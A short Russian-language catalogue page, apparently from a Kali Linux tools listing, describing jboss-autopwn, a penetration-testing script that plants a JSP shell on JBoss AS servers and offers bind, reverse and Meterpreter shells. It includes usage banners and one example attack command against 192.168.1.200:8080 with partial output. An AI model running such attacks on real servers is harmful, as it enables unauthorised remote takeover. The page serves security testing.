jboss-autopwn

26 марта 2019 в Web Applications

Описание пакета jboss-autopwn

Этот сценарий JBoss развертывает оболочку JSP на целевом сервере JBoss AS. После развертывания сценарий использует возможность загрузки и выполнения команд для предоставления интерактивного сеанса.

Особенности включают в себя:

  • Поддержка нескольких платформ - проверено на Windows, Linux и Mac
  • Поддержка связывания и обратного связывания оболочек
  • Оболочки Meterpreter и поддержка VNC для целей Windows

Инструменты, включенные в пакет jboss-autopwn

jboss-win - JBoss для Windows автоматически

root@kali:~# root@kali:~# jboss-win
      [!] JBoss Windows autopwn
      [!] Usage: ./e2.sh server port
      [!] Christian Papathanasiou cpapathanasiou@trustwave.com
      [!] Trustwave SpiderLabs

jboss-linux - JBoss * nix autopwn

root@kali:~# jboss-linux
      [!] JBoss *nix autopwn
      [!] Usage: ./e.sh server port
      [!] Christian Papathanasiou
      [!] Trustwave SpiderLabs

Пример использования jboss-autopwn

Атакуйте целевой сервер (192.168.1.200) на указанном порту (8080), перенаправив stderr (2> / dev / null):

root@kali:~# jboss-linux 192.168.1.200 8080 2> /dev/null
      [x] Retrieving cookie
      [x] Now creating BSH script...
      [!] Cound not create BSH script..
      [x] Now deploying .war file: